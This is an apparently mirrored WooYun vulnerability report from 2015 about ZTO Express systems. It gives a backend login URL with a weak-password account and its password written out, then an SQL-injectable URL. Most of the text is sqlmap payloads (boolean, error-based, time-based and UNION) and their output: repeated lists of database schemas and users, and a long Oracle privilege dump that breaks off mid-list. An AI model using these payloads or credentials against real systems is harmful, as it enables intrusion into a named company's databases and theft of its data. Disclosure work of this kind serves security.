乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-01: 细节已通知厂商并且等待厂商处理中 2015-11-02: 厂商已经确认,细节仅向厂商公开 2015-11-12: 细节向核心白帽子及相关领域专家公开 2015-11-22: 细节向普通白帽子公开 2015-12-02: 细节向实习白帽子公开 2015-12-17: 细节向公众公开
后台弱口令+SQL注射
https://sso.zt-express.com/
账号:zto73619密码:zto888888
不再一一列举SQL注入点
it.zt-express.com/Views/New/NewView.aspx?id=39937
Payload: id=39937 AND 9559=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(112)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (9559=9559) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(106)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: id=39937 AND 4328=DBMS_PIPE.RECEIVE_MESSAGE(CHR(85)||CHR(86)||CHR(74)||CHR(114),5) Type: UNION query Title: Generic UNION query (NULL) - 23 columns Payload: id=39937 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(120)||CHR(112)||CHR(107)||CHR(113)||CHR(110)||CHR(68)||CHR(110)||CHR(105)||CHR(84)||CHR(66)||CHR(76)||CHR(79)||CHR(75)||CHR(74)||CHR(113)||CHR(98)||CHR(106)||CHR(118)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-----[13:01:22] [INFO] the back-end DBMS is Oracleweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: Oracle[13:01:22] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes[13:01:22] [INFO] fetching database (schema) namesavailable databases [22]:[*] CRM[*] CTXSYS[*] DBMS[*] DBSNMP[*] DMSYS[*] EXFSYS[*] MDSYS[*] NEWZTOOA[*] OGG_SYNC[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] SYS[*] SYSTEM[*] TSMSYS[*] WDOA[*] WEIXIN[*] WMSYS[*] WULIAO[*] XDB[*] ZHONGCAI[*] ZTOWEB
Payload: id=39937 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(120)||CHR(112)||CHR(107)||CHR(113)||CHR(110)||CHR(68)||CHR(110)||CHR(105)||CHR(84)||CHR(66)||CHR(76)||CHR(79)||CHR(75)||CHR(74)||CHR(113)||CHR(98)||CHR(106)||CHR(118)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-----[13:09:53] [INFO] the back-end DBMS is Oracleweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: Oracle[13:09:53] [INFO] fetching database usersdatabase management system users [29]:[*] ANONYMOUS[*] CRM[*] CTXSYS[*] DBMS[*] DBSNMP[*] DIP[*] DMSYS[*] EXFSYS[*] MDDATA[*] MDSYS[*] NEWZTOOA[*] OGG_SYNC[*] OLAPSYS[*] ORACLE_OCM[*] ORDPLUGINS[*] ORDSYS[*] OUTLN[*] READONLY[*] SI_INFORMTN_SCHEMA[*] SYS[*] SYSTEM[*] TSMSYS[*] WDOA[*] WEIXIN[*] WMSYS[*] WULIAO[*] XDB[*] ZHONGCAI[*] ZTOWEB[13:09:53] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\it.zt-express.com'[*] shutting down at 13:09:53
Payload: id=39937 AND 5460=5460 Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: id=39937 AND 9559=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(112)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (9559=9559) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(106)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: id=39937 AND 4328=DBMS_PIPE.RECEIVE_MESSAGE(CHR(85)||CHR(86)||CHR(74)||CHR(114),5) Type: UNION query Title: Generic UNION query (NULL) - 23 columns Payload: id=39937 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(120)||CHR(112)||CHR(107)||CHR(113)||CHR(110)||CHR(68)||CHR(110)||CHR(105)||CHR(84)||CHR(66)||CHR(76)||CHR(79)||CHR(75)||CHR(74)||CHR(113)||CHR(98)||CHR(106)||CHR(118)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- ---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: Oracleavailable databases [22]:[*] CRM[*] CTXSYS[*] DBMS[*] DBSNMP[*] DMSYS[*] EXFSYS[*] MDSYS[*] NEWZTOOA[*] OGG_SYNC[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] SYS[*] SYSTEM[*] TSMSYS[*] WDOA[*] WEIXIN[*] WMSYS[*] WULIAO[*] XDB[*] ZHONGCAI[*] ZTOWEBsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=39937 AND 5460=5460 Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: id=39937 AND 9559=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(112)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (9559=9559) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(106)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: id=39937 AND 4328=DBMS_PIPE.RECEIVE_MESSAGE(CHR(85)||CHR(86)||CHR(74)||CHR(114),5) Type: UNION query Title: Generic UNION query (NULL) - 23 columns Payload: id=39937 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(120)||CHR(112)||CHR(107)||CHR(113)||CHR(110)||CHR(68)||CHR(110)||CHR(105)||CHR(84)||CHR(66)||CHR(76)||CHR(79)||CHR(75)||CHR(74)||CHR(113)||CHR(98)||CHR(106)||CHR(118)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- ---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: Oracledatabase management system users [29]:[*] ANONYMOUS[*] CRM[*] CTXSYS[*] DBMS[*] DBSNMP[*] DIP[*] DMSYS[*] EXFSYS[*] MDDATA[*] MDSYS[*] NEWZTOOA[*] OGG_SYNC[*] OLAPSYS[*] ORACLE_OCM[*] ORDPLUGINS[*] ORDSYS[*] OUTLN[*] READONLY[*] SI_INFORMTN_SCHEMA[*] SYS[*] SYSTEM[*] TSMSYS[*] WDOA[*] WEIXIN[*] WMSYS[*] WULIAO[*] XDB[*] ZHONGCAI[*] ZTOWEBsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=39937 AND 5460=5460 Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: id=39937 AND 9559=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(112)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (9559=9559) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(106)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: id=39937 AND 4328=DBMS_PIPE.RECEIVE_MESSAGE(CHR(85)||CHR(86)||CHR(74)||CHR(114),5) Type: UNION query Title: Generic UNION query (NULL) - 23 columns Payload: id=39937 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(120)||CHR(112)||CHR(107)||CHR(113)||CHR(110)||CHR(68)||CHR(110)||CHR(105)||CHR(84)||CHR(66)||CHR(76)||CHR(79)||CHR(75)||CHR(74)||CHR(113)||CHR(98)||CHR(106)||CHR(118)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- ---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: Oracledatabase management system users privileges:[*] ANONYMOUS [1]: privilege: CREATE SESSION[*] AQ_ADMINISTRATOR_ROLE [6]: privilege: CREATE EVALUATION CONTEXT privilege: CREATE RULE privilege: CREATE RULE SET privilege: DEQUEUE ANY QUEUE privilege: ENQUEUE ANY QUEUE privilege: MANAGE ANY QUEUE[*] CONNECT [1]: privilege: CREATE SESSION[*] CRM [19]: privilege: ADMINISTER DATABASE TRIGGER privilege: ALTER ANY INDEX privilege: CREATE ANY CLUSTER privilege: CREATE ANY INDEX privilege: CREATE ANY JOB privilege: CREATE ANY TABLE privilege: CREATE ANY TYPE privilege: CREATE JOB privilege: CREATE PROCEDURE privilege: CREATE PUBLIC SYNONYM privilege: CREATE ROLE privilege: CREATE SEQUENCE privilege: CREATE SESSION privilege: CREATE TABLE privilege: CREATE TRIGGER privilege: CREATE USER privilege: CREATE VIEW privilege: EXECUTE ANY PROCEDURE privilege: SELECT ANY TABLE[*] CTXSYS [7]: privilege: ALTER SESSION privilege: CREATE PUBLIC SYNONYM privilege: CREATE SESSION privilege: CREATE SYNONYM privilege: CREATE VIEW privilege: DROP PUBLIC SYNONYM privilege: UNLIMITED TABLESPACE[*] DBA [160]: privilege: ADMINISTER ANY SQL TUNING SET privilege: ADMINISTER DATABASE TRIGGER privilege: ADMINISTER RESOURCE MANAGER privilege: ADMINISTER SQL TUNING SET privilege: ADVISOR privilege: ALTER ANY CLUSTER privilege: ALTER ANY DIMENSION privilege: ALTER ANY EVALUATION CONTEXT privilege: ALTER ANY INDEX privilege: ALTER ANY INDEXTYPE privilege: ALTER ANY LIBRARY privilege: ALTER ANY MATERIALIZED VIEW privilege: ALTER ANY OUTLINE privilege: ALTER ANY PROCEDURE privilege: ALTER ANY ROLE privilege: ALTER ANY RULE privilege: ALTER ANY RULE SET privilege: ALTER ANY SEQUENCE privilege: ALTER ANY SQL PROFILE privilege: ALTER ANY TABLE privilege: ALTER ANY TRIGGER privilege: ALTER ANY TYPE privilege: ALTER DATABASE privilege: ALTER PROFILE privilege: ALTER RESOURCE COST privilege: ALTER ROLLBACK SEGMENT privilege: ALTER SESSION privilege: ALTER SYSTEM privilege: ALTER TABLESPACE privilege: ALTER USER privilege: ANALYZE ANY privilege: ANALYZE ANY DICTIONARY privilege: AUDIT ANY privilege: AUDIT SYSTEM privilege: BACKUP ANY TABLE privilege: BECOME USER privilege: CHANGE NOTIFICATION privilege: COMMENT ANY TABLE privilege: CREATE ANY CLUSTER privilege: CREATE ANY CONTEXT privilege: CREATE ANY DIMENSION privilege: CREATE ANY DIRECTORY privilege: CREATE ANY EVALUATION CONTEXT privilege: CREATE ANY INDEX privilege: CREATE ANY INDEXTYPE privilege: CREATE ANY JOB privilege: CREATE ANY LIBRARY privilege: CREATE ANY MATERIALIZED VIEW privilege: CREATE ANY OPERATOR privilege: CREATE ANY OUTLINE privilege: CREATE ANY PROCEDURE privilege: CREATE ANY RULE privilege: CREATE ANY RULE SET privilege: CREATE ANY SEQUENCE privilege: CREATE ANY SQL PROFILE privilege: CREATE ANY SYNONYM privilege: CREATE ANY TABLE privilege: CREATE ANY TRIGGER privilege: CREATE ANY TYPE privilege: CREATE ANY VIEW privilege: CREATE CLUSTER privilege: CREATE DATABASE LINK privilege: CREATE DIMENSION privilege: CREATE EVALUATION CONTEXT privilege: CREATE EXTERNAL JOB privilege: CREATE INDEXTYPE privilege: CREATE JOB privilege: CREATE LIBRARY privilege: CREATE MATERIALIZED VIEW privilege: CREATE OPERATOR privilege: CREATE PROCEDURE privilege: CREATE PROFILE privilege: CREATE PUBLIC DATABASE LINK privilege: CREATE PUBLIC SYNONYM privilege: CREATE ROLE privilege: CREATE ROLLBACK SEGMENT privilege: CREATE RULE privilege: CREATE RULE SET privilege: CREATE SEQUENCE privilege: CREATE SESSION privilege: CREATE SYNONYM privilege: CREATE TABLE privilege: CREATE TABLESPACE privilege: CREATE TRIGGER privilege: CREATE TYPE privilege: CREATE USER privilege: CREATE VIEW privilege: DEBUG ANY PROCEDURE privilege: DEBUG CONNECT SESSION privilege: DELETE ANY TABLE privilege: DEQUEUE ANY QUEUE privilege: DROP ANY CLUSTER privilege: DROP ANY CONTEXT privilege: DROP ANY DIMENSION privilege: DROP ANY DIRECTORY privilege: DROP ANY EVALUATION CONTEXT privilege: DROP ANY INDEX privilege: DROP ANY INDEXTYPE privilege: DROP ANY LIBRARY privilege: DROP ANY MATERIALIZED VIEW privilege: DROP ANY OPERATOR privilege: DROP ANY OUTLINE privilege: DROP ANY PROCEDURE privilege: DROP ANY ROLE privilege: DROP ANY RULE privilege: DROP ANY RULE SET privilege: DROP ANY SEQUENCE privilege: DROP ANY SQL PROFILE privilege: DROP ANY SYNONYM privilege: DROP ANY TABLE privilege: DROP ANY TRIGGER privilege: DROP ANY TYPE privilege: DROP ANY VIEW privilege: DROP PROFILE privilege: DROP PUBLIC DATABASE LINK privilege: DROP PUBLIC SYNONYM privilege: DROP ROLLBACK SEGMENT privilege: DROP TABLESPACE privilege: DROP USER privilege: ENQUEUE ANY QUEUE privilege: EXECUTE ANY CLASS privilege: EXECUTE ANY EVALUATION CONTEXT privilege: EXECUTE ANY INDEXTYPE privilege: EXECUTE ANY LIBRARY privilege: EXECUTE ANY OPERATOR privilege: EXECUTE ANY PROCEDURE privilege: EXECUTE ANY PROGRAM privilege: EXECUTE ANY RULE privilege: EXECUTE ANY RULE SET privilege: EXECUTE ANY TYPE privilege: EXPORT FULL DATABASE privilege: FLASHBACK ANY TABLE privilege: FORCE ANY TRANSACTION privilege: FORCE TRANSACTION privilege: GLOBAL QUERY REWRITE privilege: GRANT ANY OBJECT PRIVILEGE privilege: GRANT ANY PRIVILEGE privilege: GRANT ANY ROLE privilege: IMPORT FULL DATABASE privilege: INSERT ANY TABLE privilege: LOCK ANY TABLE privilege: MANAGE ANY FILE GROUP privilege: MANAGE ANY QUEUE privilege: MANAGE FILE GROUP privilege: MANAGE SCHEDULER privilege: MANAGE TABLESPACE privilege: MERGE ANY VIEW privilege: ON COMMIT REFRESH privilege: QUERY REWRITE privilege: READ ANY FILE GROUP privilege: RESTRICTED SESSION privilege: RESUMABLE privilege: SELECT ANY DICTIONARY privilege: SELECT ANY SEQUENCE privilege: SELECT ANY TABLE privilege: SELECT ANY TRANSACTION privilege: UNDER ANY TABLE privilege: UNDER ANY TYPE privilege: UNDER ANY VIEW privilege: UPDATE ANY TABLE[*] DBMS [2]: privilege: CREATE SESSION privilege: UNLIMITED TABLESPACE[*] DBSNMP [4]: privilege: CREATE PROCEDURE privilege: CREATE TABLE privilege: SELECT ANY DICTIONARY privilege: UNLIMITED TABLESPACE[*] DIP [1]: privilege: CREATE SESSION[*] DMSYS [15]: privilege: ALTER SESSION privilege: ALTER SYSTEM privilege: CREATE JOB privilege: CREATE LIBRARY privilege: CREATE PROCEDURE privilege: CREATE PUBLIC SYNONYM privilege: CREATE SEQUENCE privilege: CREATE SESSION privilege: CREATE SYNONYM privilege: CREATE TABLE privilege: CREATE TRIGGER privilege: CREATE TYPE privilege: CREATE VIEW privilege: DROP PUBLIC SYNONYM privilege: QUERY REWRITE[*] EXFSYS [8]: privilege: ADMINISTER DATABASE TRIGGER privilege: CREATE ANY TRIGGER privilege: CREATE INDEXTYPE privilege: CREATE JOB privilege: CREATE LIBRARY privilege: CREATE OPERATOR privilege: MANAGE SCHEDULER privilege: UNLIMITED TABLESPACE[*] EXP_FULL_DATABASE [8]: privilege: ADMINISTER RESOURCE MANAGER privilege: BACKUP ANY TABLE privilege: EXECUTE ANY PROCEDURE privilege: EXECUTE ANY TYPE privilege: READ ANY FILE GROUP privilege: RESUMABLE privilege: SELECT ANY SEQUENCE privilege: SELECT ANY TABLE[*] IMP_FULL_DATABASE [68]: privilege: ADMINISTER DATABASE TRIGGER privilege: ADMINISTER RESOURCE MANAGER privilege: ALTER ANY PROCEDURE privilege: ALTER ANY TABLE privilege: ALTER ANY TRIGGER privilege: ALTER ANY TYPE privilege: ANALYZE ANY privilege: AUDIT ANY privilege: BECOME USER privilege: COMMENT ANY TABLE privilege: CREATE ANY CLUSTER privilege: CREATE ANY CONTEXT privilege: CREATE ANY DIMENSION privilege: CREATE ANY DIRECTORY privilege: CREATE ANY INDEX privilege: CREATE ANY INDEXTYPE privilege: CREATE ANY LIBRARY privilege: CREATE ANY MATERIALIZED VIEW privilege: CREATE ANY OPERATOR privilege: CREATE ANY PROCEDURE privilege: CREATE ANY SEQUENCE privilege: CREATE ANY SQL PROFILE privilege: CREATE ANY SYNONYM privilege: CREATE ANY TABLE privilege: CREATE ANY TRIGGER privilege: CREATE ANY TYPE privilege: CREATE ANY VIEW privilege: CREATE DATABASE LINK privilege: CREATE PROFILE privilege: CREATE PUBLIC DATABASE LINK privilege: CREATE PUBLIC SYNONYM privilege: CREATE ROLE privilege: CREATE ROLLBACK SEGMENT privilege: CREATE TABLESPACE privilege: CREATE USER privilege: DROP ANY CLUSTER privilege: DROP ANY CONTEXT privilege: DROP ANY DIMENSION privilege: DROP ANY DIRECTORY privilege: DROP ANY INDEX privilege: DROP ANY INDEXTYPE privilege: DROP ANY LIBRARY privilege: DROP ANY MATERIALIZED VIEW privilege: DROP ANY OPERATOR privilege: DROP ANY OUTLINE privilege: DROP ANY PROCEDURE privilege: DROP ANY ROLE privilege: DROP ANY SEQUENCE privilege: DROP ANY SQL PROFILE privilege: DROP ANY SYNONYM privilege: DROP ANY TABLE privilege: DROP ANY TRIGGER privilege: DROP ANY TYPE privilege: DROP ANY VIEW privilege: DROP PROFILE privilege: DROP PUBLIC DATABASE LINK privilege: DROP PUBLIC SYNONYM privilege: DROP ROLLBACK SEGMENT privilege: DROP TABLESPACE privilege: DROP USER privilege: EXECUTE ANY PROCEDURE privilege: EXECUTE ANY TYPE privilege: GLOBAL QUERY REWRITE privilege: INSERT ANY TABLE privilege: MANAGE ANY QUEUE privilege: RESUMABLE privilege: SELECT ANY TABLE privilege: UPDATE ANY TABLE[*] JAVADEBUGPRIV [2]: privilege: DEBUG ANY PROCEDURE privilege: DEBUG CONNECT SESSION[*] MDDATA [1]: privilege: UNLIMITED TABLESPACE[*] MDSYS [14]: privilege: CREATE ANY TRIGGER privilege: CREATE INDEXTYPE privilege: CREATE LIBRARY privilege: CREATE OPERATOR privilege: CREATE PROCEDURE privilege: CREATE PUBLIC SYNONYM privilege: CREATE SEQUENCE privilege: CREATE SESSION privilege: CREATE TABLE privilege: CREATE TYPE privilege: CREATE VIEW privilege: DELETE ANY TABLE privilege: DROP PUBLIC SYNONYM privilege: UNLIMITED TABLESPACE[*] NEWZTOOA [3]: privilege: ALTER ANY TABLE privilege: ALTER TABLESPACE privilege: UNLIMITED TABLESPACE[*] OEM_ADVISOR [3]: privilege: ADMINISTER SQL TUNING SET privilege: ADVISOR privilege: CREATE JOB[*] OEM_MONITOR [7]: privilege: ADVISOR privilege: ANALYZE ANY privilege: ANALYZE ANY DICTIONARY privilege: CREATE JOB privilege: CREATE SESSION privilege: MANAGE ANY QUEUE privilege: SELECT ANY DICTIONARY[*] OGG_SYNC [2]: privilege: CREATE SESSION privilege: UNLIMITED TABLESPACE[*] OLAP_DBA [10]: privilege: CREATE ANY TABLE privilege: CREATE ANY VIEW privilege: CREATE JOB privilege: CREATE SESSION privilege: DELETE ANY TABLE privilege: DROP ANY TABLE privilege: DROP ANY VIEW privilege: INSERT ANY TABLE privilege: SELECT ANY TABLE privilege: UPDATE ANY TABLE[*] OLAP_USER [5]: privilege: CREATE JOB privilege: CREATE SEQUENCE privilege: CREATE SESSION privilege: CREATE TABLE privilege: CREATE VIEW[*] OLAPSYS [14]: privilege: CREATE ANY DIMENSION privilege: CREATE ANY SYNONYM privilege: CREATE PROCEDURE privilege: CREATE PUBLIC SYNONYM privilege: CREATE SEQUENCE privilege: CREATE SESSION privilege: CREATE TABLE privilege: CREATE VIEW privilege: DROP ANY DIMENSION privilege: DROP ANY SYNONYM privilege: DROP PUBLIC SYNONYM privilege: SELECT ANY DICTIONARY privilege: SELECT ANY TABLE privilege: UNLIMITED TABLESPACE[*] ORACLE_OCM [1]: privilege: SELECT ANY DICTIONARY[*] ORDPLUGINS [10]: privilege: CREATE INDEXTYPE privilege: CREATE LIBRARY privilege: CREATE OPERATOR privilege: CREATE PROCEDURE privilege: CREATE PUBLIC SYNONYM privilege: CREATE SESSION privilege: CREATE TABLE privilege: CREATE TYPE privilege: DROP PUBLIC SYNONYM privilege: UNLIMITED TABLESPACE[*] ORDSYS [13]: privilege: CREATE ANY SYNONYM privilege: CREATE INDEXTYPE privilege: CREATE LIBRARY privilege: CREATE OPERATOR privilege: CREATE PROCEDURE privilege: CREATE PUBLIC SYNONYM privilege: CREATE SESSION privilege: CREATE TABLE privilege: CREATE TYPE privilege: CREATE VIEW privilege: DROP ANY SYNONYM privilege: DROP PUBLIC SYNONYM privilege: UNLIMITED TABLESPACE[*] OUTLN [3]: privilege: CREATE SESSION privilege: EXECUTE ANY PROCEDURE privilege: UNLIMITED TABLESPACE[*] READONLY [2]: privilege: CREATE SESSION privilege: SELECT ANY TABLE[*] RECOVERY_CATALOG_OWNER [11]: privilege: ALTER SESSION privilege: CREATE CLUSTER privilege: CREATE DATABASE LINK privilege: CREATE PROCEDURE privilege: CREATE SEQUENCE privilege: CREATE SESSION privilege: CREATE SYNONYM privilege: CREATE TABLE privilege: CREATE TRIGGER privilege: CREATE TYPE privilege: CREATE VIEW[*] RESOURCE [8]: privilege: CREATE CLUSTER privilege: CREATE INDEXTYPE privilege: CREATE OPERATOR privilege: CREATE PROCEDURE privilege: CREATE SEQUENCE privilege: CREATE TABLE privilege: CREATE TRIGGER privilege: CREATE TYPE[*] SCHEDULER_ADMIN [6]: privilege: CREATE ANY JOB privilege: CREATE EXTERNAL JOB privilege: CREATE JOB privilege: EXECUTE ANY CLASS privilege: EXECUTE ANY PROGRAM privilege: MANAGE SCHEDULER[*] SI_INFORMTN_SCHEMA [1]: privilege: UNLIMITED TABLESPACE[*] SYS [159]: privilege: ADMINISTER ANY SQL TUNING SET privilege: ADMINISTER DATABASE TRIGGER privilege: ADMINISTER RESOURCE MANAGER privilege: ADMINISTER SQL TUNING SET privilege: ADVISOR privilege: ALTER ANY CLUSTER privilege: ALTER ANY DIMENSION privilege: ALTER ANY EVALUATION CONTEXT privilege: ALTER ANY INDEX privilege: ALTER ANY INDEXTYPE privilege: ALTER ANY LIBRARY privilege: ALTER ANY MATERIALIZED VIEW privilege: ALTER ANY OUTLINE privilege: ALTER ANY PROCEDURE privilege: ALTER ANY ROLE privilege: ALTER ANY RULE privilege: ALTER ANY RULE SET privilege: ALTER ANY SEQUENCE privilege: ALTER ANY SQL PROFILE privilege: ALTER ANY TABLE privilege: ALTER ANY TRIGGER privilege: ALTER ANY TYPE privilege: ALTER DATABASE privilege: ALTER PROFILE privilege: ALTER RESOURCE COST privilege: ALTER ROLLBACK SEGMENT privilege: ALTER SESSION privilege: ALTER SYSTEM privilege: ALTER TABLESPACE privilege: ALTER USER privilege: ANALYZE ANY privilege: AUDIT ANY privilege: AUDIT SYSTEM privilege: BACKUP ANY TABLE privilege: BECOME USER privilege: CHANGE NOTIFICATION privilege: COMMENT ANY TABLE privilege: CREATE ANY CLUSTER privilege: CREATE ANY CONTEXT privilege: CREATE ANY DIMENSION privilege: CREATE ANY DIRECTORY privilege: CREATE ANY EVALUATION CONTEXT privilege: CREATE ANY INDEX privilege: CREATE ANY INDEXTYPE privilege: CREATE ANY JOB privilege: CREATE ANY LIBRARY privilege: CREATE ANY MATERIALIZED VIEW privilege: CREATE ANY OPERATOR privilege: CREATE ANY OUTLINE privilege: CREATE ANY PROCEDURE privilege: CREATE ANY RULE privilege: CREATE ANY RULE SET privilege: CREATE ANY SEQUENCE privilege: CREATE ANY SQL PROFILE privilege: CREATE ANY SYNONYM privilege: CREATE ANY TABLE privilege: CREATE ANY TRIGGER privilege: CREATE ANY TYPE privilege: CREATE ANY VIEW privilege: CREATE CLUSTER privilege: CREATE DATABASE LINK privilege: CREATE DIMENSION privilege: CREATE EVALUATION CONTEXT privilege: CREATE EXTERNAL JOB privilege: CREATE INDEXTYPE privilege: CREATE JOB privilege: CREATE LIBRARY privilege: CREATE MATERIALIZED VIEW privilege: CREATE OPERATOR privilege: CREATE PROCEDURE privilege: CREATE PROFILE privilege: CREATE PUBLIC DATABASE LINK privilege: CREATE PUBLIC SYNONYM privilege: CREATE ROLE privilege: CREATE ROLLBACK SEGMENT privilege: CREATE RULE privilege: CREATE RULE SET privilege: CREATE SEQUENCE privilege: CREATE SESSION privilege: CREATE SYNONYM privilege: CREATE TABLE privilege: CREATE TABLESPACE privilege: CREATE TRIGGER privilege: CREATE TYPE privilege: CREATE USER privilege: CREATE VIEW privilege: DEBUG ANY PROCEDURE privilege: DEBUG CONNECT SESSION privilege: DELETE ANY TABLE privilege: DEQUEUE ANY QUEUE privilege: DROP ANY CLUSTER privilege: DROP ANY CONTEXT privilege: DROP ANY DIMENSION privilege: DROP ANY DIRECTORY privilege: DROP ANY EVALUATION CONTEXT privilege: DROP ANY INDEX privilege: DROP ANY INDEXTYPE privilege: DROP ANY LIBRARY privilege: DROP ANY MATERIALIZED VIEW privilege: DROP ANY OPERATOR privilege: DROP ANY OUTLINE privilege: DROP ANY PROCEDURE privilege: DROP ANY ROLE privilege: DROP ANY RULE privilege: DROP ANY RULE SET privilege: DROP ANY SEQUENCE privilege: DROP ANY SQL PROFILE privilege: DROP ANY SYNONYM privilege: DROP ANY TABLE privilege: DROP ANY TRIGGER privilege: DROP ANY TYPE privilege: DROP ANY VIEW privilege: DROP PROFILE privilege: DROP PUBLIC DATABASE LINK privilege: DROP PUBLIC SYNONYM privilege: DROP ROLLBACK SEGMENT privilege: DROP TABLESPACE privilege: DROP USER privilege: ENQUEUE ANY QUEUE privilege: EXECUTE ANY CLASS privilege: EXECUTE ANY EVALUATION CONTEXT privilege: EXECUTE ANY INDEXTYPE privilege: EXECUTE ANY LIBRARY privilege: EXECUTE ANY OPERATOR privilege: EXECUTE ANY PROCEDURE privilege: EXECUTE ANY PROGRAM privilege: EXECUTE ANY RULE privilege: EXECUTE ANY RULE SET privilege: EXECUTE ANY TYPE privilege: EXPORT FULL DATABASE privilege: FLASHBACK ANY TABLE privilege: FORCE ANY TRANSACTION privilege: FORCE TRANSACTION privilege: GLOBAL QUERY REWRITE privilege: GRANT ANY OBJECT PRIVILEGE privilege: GRANT ANY PRIVILEGE privilege: GRANT ANY ROLE privilege: IMPORT FULL DATABASE privilege: INSERT ANY TABLE privilege: LOCK ANY TABLE privilege: MANAGE ANY FILE GROUP privilege: MANAGE ANY QUEUE privilege: MANAGE FILE GROUP privilege: MANAGE SCHEDULER privilege: MANAGE TABLESPACE privilege: MERGE ANY VIEW privilege: ON COMMIT REFRESH privilege: QUERY REWRITE privilege: READ ANY FILE GROUP privilege: RESTRICTED SESSION privilege: RESUMABLE privilege: SELECT ANY SEQUENCE privilege: SELECT ANY TABLE privilege: SELECT ANY TRANSACTION privilege: UNDER ANY TABLE privilege: UNDER ANY TYPE privilege: UNDER ANY VIEW privilege: UNLIMITED TABLESPACE privilege: UPDATE ANY TABLE[*] SYSTEM [5]: privilege: CREATE MATERIALIZED VIEW privilege: CREATE TABLE privilege: GLOBAL QUERY REWRITE privilege: SELECT ANY TABLE privilege: UNLIMITED TABLESPACE[*] TSMSYS [1]: privilege: UNLIMITED TABLESPACE[*] WDOA [8]: privilege: CREATE JOB privilege: CREATE PROCEDURE privilege: CREATE PUBLIC SYNONYM privilege: CREATE SEQUENCE privilege: CREATE SESSION privilege: CREATE TRIGGER privilege: CREATE USER privilege: CREATE VIEW[*] WEIXIN [10]: privilege: ADMINISTER DATABASE TRIGGER privilege: CREATE PROCEDURE privilege: CREATE PUBLIC SYNONYM privilege: CREATE SEQUENCE privilege: CREATE SESSION privilege: CREATE TABLE privilege: CREATE TRIGGER privilege: CREATE VIEW privilege: EXECUTE ANY PROCEDURE privilege: UNLIMITED TABLESPACE[*] WMSYS [29]: privilege: ADMINISTER DATABASE TRIGGER privilege: ALTER ANY INDEX privilege: ALTER ANY PROCEDURE privilege: ALTER ANY TABLE privilege: ALTER ANY TRIGGER privilege: ALTER USER privilege: CREATE ANY INDEX privilege: CREATE ANY PROCEDURE privilege: CREATE ANY TABLE privilege: CREATE ANY TRIGGER privilege: CREATE ANY VIEW privilege: CREATE PUBLIC SYNONYM privilege: CREATE ROLE privilege: CREATE SEQUENCE privilege: DELETE ANY TABLE privilege: DROP ANY INDEX privilege: DROP ANY PROCEDURE privilege: DROP ANY TABLE privilege: DROP ANY TRIGGER privilege: DROP ANY VIEW privilege: DROP PUBLIC SYNONYM privilege: EXECUTE ANY PROCEDURE 